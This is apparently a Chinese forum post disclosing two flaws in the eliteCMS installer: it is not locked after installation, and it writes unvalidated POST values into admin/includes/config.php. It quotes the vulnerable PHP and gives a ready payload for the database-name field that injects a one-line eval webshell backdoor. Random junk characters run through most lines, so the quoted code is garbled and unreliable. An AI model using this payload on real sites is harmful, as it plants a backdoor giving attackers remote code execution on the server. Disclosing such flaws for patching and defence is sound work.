eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装9 V9 b- v) p% Z$ z. S+ c* j
1 | V; |) \4 `另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php' A G' A6 N" y( O# t$ [
我们来看代码: D0 z+ h$ H- ~: U2 h
$ @: a9 |4 H2 c. l( S/ I7 ^* a...
% j5 O" D0 M9 x4 G! Jelseif ($_GET['step'] == "4") {9 }/ M. ^. A$ z8 B% `3 Q% N
$file = "../admin/includes/config.php";& G* w3 @$ k) P. L. [) n5 G
$write = "<?php\n";' r& t# V4 X& T: [. `
$write .= "/**\n";
' K# ~9 _! s+ E $write .= "*\n";
7 ~6 z& S' b# B/ M. Z* p9 u7 x $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
" j [$ X+ y e8 ^ J...略..., b% \6 B2 k7 t1 A
$write .= "*\n";; C$ I f1 I$ j5 c; F& v d7 J9 O
$write .= "*/\n";
) `: [& e2 M4 e* i/ H/ u% x2 b $write .= "\n";
! a- P( X0 ~; n) S7 p3 N" l T; | $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";1 j, x0 P! B( M3 b1 V' f: o/ I
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
0 l u3 S1 L3 v# i $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";; q; X& o( E3 h Y2 E9 D
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";. i- T) L6 ^4 Z% b; L
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% Y3 \5 E8 l9 K$ }# U" n
$write .= "if (!\$connection) {\n";
! c- t$ V& D; W8 N( K $write .= " die(\"Database connection failed\" .mysql_error());\n";9 ^$ {+ j. v) k, S
$write .= " \n";- ^- a: R* E% z+ S
$write .= "} \n";% V l! C' V% Y5 q' }' e
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
. |6 Q2 p6 k$ C- D- V $write .= "if (!\$db_select) {\n";
7 o/ _) H* _+ P& V. P1 J0 p2 | $write .= " die(\"Database select failed\" .mysql_error());\n";
; a- P, M% s" t. i+ N $write .= " \n";$ K E; M8 \- I7 v3 w8 Q K% B
$write .= "} \n";: u# v5 b0 S9 T4 M+ ?# B
$write .= "?>\n";2 N! ?2 H z1 d8 |) J
# Z& }) X7 y! G- m8 X $writer = fopen($file, 'w');
9 ]- \7 f1 o, S0 L...3 Q& B9 t* u4 f9 Q
; W; I4 I0 H; y) c# v8 t4 Z在看代码:
# M4 B2 T& _# J% j8 s
5 J+ E* q% W1 P$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];- U% ?6 d* K% I. f6 X
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];" L; @/ B& s2 J. O
$_SESSION['DB_USER'] = $_POST['DB_USER'];3 G6 H# _( D2 |9 R) W
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
( U& t+ M' H0 D' j! K; ?
5 e; l( ]1 }- d! S2 v取值未作任何验证
$ \2 W: S0 K- m如果将数据库名POST数据:# m9 i3 s) p. q* t
, R7 c+ i# w0 L& |/ V" L7 y7 n; p"?><?php eval($_POST[c]);?><?php" G Y" @5 {6 `* P9 U2 I3 C
: {# `4 l- w3 u$ a将导致一句话后门写入/admin/includes/config.php& Z9 k- s8 } d, |, q, G
|
发表于 2012-11-18 13:59:27
收藏
支持
反对